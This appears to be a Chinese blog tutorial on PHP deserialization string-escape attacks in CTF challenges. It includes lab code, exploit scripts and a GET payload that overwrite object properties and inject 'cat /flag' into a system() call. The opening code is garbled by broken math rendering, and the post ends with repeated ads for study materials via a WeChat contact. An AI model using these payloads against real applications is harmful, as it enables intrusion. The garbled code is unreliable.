//利用一个变量修改目标变量
{
return str_replace(‘b’,‘cc’,$str);
}
class A{
public $name=‘ben’;
public $info=“ctfer”;
}
t
e
s
t
1
=
n
e
w
A
(
)
;
p
r
i
n
t
_
r
(
test1=new A(); print\_r(
test1=newA();print_r(test1).“\n”;
echo “\n”.serialize($test1).“\n”;
$tar=‘";s:4:“info”;s:6:“hacker”;}’; //27
p
a
y
l
o
a
d
=
g
e
t
_
p
a
y
l
o
a
d
(
′
b
′
,
s
t
r
l
e
n
(
payload=get\_payload('b',strlen(
payload=get_payload(′b′,strlen(tar),$tar); //利用getpayload生成利用的payload
t
e
s
t
1
−
>
n
a
m
e
=
test1->name=
test1−>name=payload;
print_r(KaTeX parse error: Undefined control sequence: \n at position 9: test1)."\̲n̲"; print\_r(ser…test1)).“\n”;
r
e
s
=
f
i
l
t
e
r
_
r
e
p
m
o
r
e
(
s
e
r
i
a
l
i
z
e
(
res=filter\_repmore(serialize(
res=filter_repmore(serialize(test1));
echo “\n”.$res.“\n”;
c
=
u
n
s
e
r
i
a
l
i
z
e
(
c=unserialize(
c=unserialize(res);
print_r($c);
?>
![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/15d5a393504f40aa9e42e41a262a5d9f.png#pic_center)
可以看到,info的值被修改了
接下来以一道简单的题目来讲构造流程
#### 题目实战
newstarctf 2024 week4 逃
![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/ef79a750748c4633a44e258c2262c1fc.png#pic_center)
可以看到,这里有个waf过滤函数,把对象序列化并过滤后再反序列化,是过滤后变长的题型
总体思路—>利用我们能控制的key去修改cmd,在\_\_destruct中system执行cmd
具体实现:
1拿下来源码放在本地,稍作修改:
<?php include "func.php"; //highlight\_file(\_\_FILE\_\_); function waf($str) { return str\_replace("bad", "good", $str); } //利用key去修改cmd key= class GetFlag { public $key='123'; public $cmd = "ls"; #cmd是我们要去修改的,先写死 public function \_\_construct($key) { $this->key = $key; } public function \_\_destruct() { system($this->cmd); } } echo serialize(new GetFlag()); # ``` 这段代码就是查看正常的序列化后的字符串(其中含有我们想要的cmd值),当然如果对序列化熟悉的话可以直接构造payload ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/b3324cfb9ffb46769702a74855a5093e.png#pic_center) 把红框部分拿下来即可 2.配合前面写的get\_payload函数构造payload,并在本地尝试是否成功 bad被替换为good,一个bad可以逃逸一个字符,所以需要直接传入序列化字符串长度即可 ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/5efbed53f25c48bc9623bca18373bc43.png#pic_center) 可以看到,在本地实验成功,接下来只要修改cmd的值为其他系统命令,**再修改序列化字符串中cmd的长度**,然后把$payload传过去即可 最后的exp: ``` <?php include "func.php"; //highlight\_file(\_\_FILE\_\_); function waf($str) { return str\_replace("bad", "good", $str); } //利用key去修改cmd class GetFlag { public $key='ls'; public $cmd = "whoami"; public function \_\_construct($key) { $this->key = $key; } public function \_\_destruct() { system($this->cmd); } } $key='";s:3:"cmd";s:9:"cat /flag";}'; $payload=get\_payload('bad',strlen($key),$key); echo "\n".$payload; ?>
![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/3d151f693b734d32a4ae325cd3baa859.png#pic_center)
把payload赋值为key即可,
结果:
![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/7354fa75b6cf4340a6cf40bc5100b8d6.png#pic_center)
### 过滤后变短
#### 实验学习
<?php include "func.php"; function filter\_repless($str) //利用两个变量修改目标变量 { return str\_replace('b','',$str); } class C{ // name全填上会被替换的内容 public $name='ben'; // info填payload public $info="ctfer"; public $password='123456'; } ``` 像上面的过滤函数,把b替换为空,替换后序列化的字符串长度减少,就是过滤后变短的情况,这一种就是与变长不同,要利用两个变量(info和name)去修改两个变量(info和password) 第一步,也是要先拿到我们含有修改目标的序列化字符串,name值随意 ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/a6e5eb41c6e3415c88b487dd3ebf41ef.png#pic_center) 我们的目的也是一样的,要通过";构造闭合,然后让php来反序列化我们设计好的序列化字符串,从而修改变量,尝试把info的值赋值为上面红框里的序列化字符串,那为什么不跟变长的类型一样,直接把序列化字符串跟在name的值后面呢?看下图: ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/839005acc18f4a89bda1c0693e37db90.png#pic_center) 如果跟在name后面,由于name的长度本身就很长,过滤后name的值变短了,我们的序列化字符串就会被读取为name的值(逃不出去),就无法发挥它的作用了,所以要把info的值设为序列化字符串 ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/7cfcac1b340e471fb81ef5f8a01d4fbd.png#pic_center) 如果要让绿框内的字符串正常反序列化,而不是被当作字符串读取,红框内的全部内容就填充进name的值中,";s:4:“info”;s:60:"长度为19,**如果name的值设为19个b,经过过滤函数过滤为空后,那么php就会往下读取,把本不该读取的 “;s:4:“info”;s:60:” 读取为name的值,后面的序列化字符串就会逃逸出去,不被当作字符串来读取,而是被成功反序列化,修改info** 完整实验代码: ``` <?php include "func.php"; function filter\_repless($str) //利用两个变量修改目标变量 { return str\_replace('b','',$str); } class C{ // name全填上会被替换的内容 public $name='ben'; // info填payload public $info="ctfer"; public $password='123456'; } $test1=new C(); echo serialize($test1)."\n"; $tar='";s:4:"info";s:6:"hacker";s:8:"password";s:10:"helloworld";}'; $test1->name=get\_payload('b',19); $test1->info=$tar; print\_r(($test1)); $res=serialize($test1); $r=filter\_repless($res); echo $res; echo "\n".$r."\n"; $c=unserialize($r); print\_r($c); ?>
![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/902eb66514234c47be1e128de80aee89.png#pic_center)
反序列化成功,password被修改,name具体要多少个被替换的字符,要根据题目实际来计算
#### 题目实战
上网找了一个也是比较简单的题目的源码
<?php show\_source("index123.php"); //error\_reporting(0); function filter($str) { return preg\_replace('/abc|zcxx/','',$str); } class Login{ public $name; public $pwd; public $money; public function \_\_construct() { $this->name=$\_GET['name']; $this->pwd=$\_GET['pwd']; $this->money='999'; } } if($\_GET['name']&&$\_GET['pwd']) { $login = new Login(); $last = unserialize(filter(serialize($login))); if ($last->money < 1000) { echo('get more money'); } else { echo file\_get\_contents('flag.php'); } } else { die("name and password can't be null"); } ?>
由源码可知,需要修改money参数>1000,才能拿到flag,name和pwd是我们可以控制的,利用name和pwd修改money,由过滤函数可知过滤后变短的题型,
1.本地拿下源码,先构造出包含(money=1001,pwd的属性和值) 的正常的序列化后的字符串,目的就是赋值给pwd,在反序列化时能够按照我们设定的来反序列化,从而修改money**别忘记开头要包含 "; 来手动闭合**
![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/186c9a4d974348db9d1cb8b965d3c2da.png#pic_center)
2.然后先把name赋值给abc,查看过滤后的序列化字符串,计算要逃逸的字符数量
![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/46f3c956550548a79375aee7d72357cc.png#pic_center)
如上图,我们的目的是,在反序列化时 “;s:3:“pwd”;s:46:” 时作为name的字符串内容来读取,后面的红框内容就可以逃出去,按照反序列化流程来修改money, “;s:3:“pwd”;s:46:” 长度为18,一个abc能提供3个字符逃逸,所以我们把name赋值为6个abc即可
最终exp:
<?php include "func.php"; function filter($str) { return preg\_replace('/abc|zcxx/','',$str); } class Login{ public $name; public $pwd; public $money; public function \_\_construct() { $this->name='abc'; $this->pwd='123'; $this->money='1001'; } } $test=new Login(); $test->pwd='";s:3:"pwd";s:3:"123";s:5:"money";s:4:"1001";}'; $tar='";s:3:"pwd";s:46:"'; //26 echo strlen($tar); $test->name=get\_payload('abc',6); echo filter(serialize($test)); print\_r(unserialize(filter(serialize($test)))); echo"\n".$test->name; echo"\n".$test->pwd; ?>
![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/bb85c713bcd94baebf82242672929325.png#pic_center)
在本地的环境实验后得知,money的值成功被修改,然后构造payload即可
/?name=abcabcabcabcabcabc&pwd=";s:3:“pwd”;s:3:“123”;s:5:“money”;s:4:“1001”;}
结果:
![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/943cd2679df14def8ba02148b4e1e465.png#pic_center)
**自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。**
**深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!**
**因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。**
![img](https://img-blog.csdnimg.cn/img_convert/0b4ba3c9bb51ec556dc34cc15bf6413f.png)
![img](https://img-blog.csdnimg.cn/img_convert/c4761b1c4f9cb83214c14d7759b206f1.png)
![img](https://img-blog.csdnimg.cn/img_convert/72adafda18f9acc751f1219a65fc382a.png)
![img](https://img-blog.csdnimg.cn/img_convert/66d48af161514f047f9065a4d75cd75f.png)
![img](https://img-blog.csdnimg.cn/img_convert/5a7f4456543049d15bd14ace2a314abd.png)
![img](https://img-blog.csdnimg.cn/img_convert/a3b59edce69a3dc279f4a101cd1f2a99.png)
**既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点,真正体系化!**
**由于文件比较大,这里只是将部分目录大纲截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且后续会持续更新**
**如果你觉得这些内容对你有帮助,可以添加VX:vip204888 (备注网络安全获取)**
![img](https://img-blog.csdnimg.cn/img_convert/3286f01890dbf85e726c494900b7d7ad.png)
1015)]
[外链图片转存中...(img-UfXWuNUC-1712855331015)]
[外链图片转存中...(img-mbxyWvxl-1712855331016)]
[外链图片转存中...(img-lklZmZAy-1712855331016)]
**既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点,真正体系化!**
**由于文件比较大,这里只是将部分目录大纲截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且后续会持续更新**
**如果你觉得这些内容对你有帮助,可以添加VX:vip204888 (备注网络安全获取)**
[外链图片转存中...(img-4LruoqZm-1712855331016)]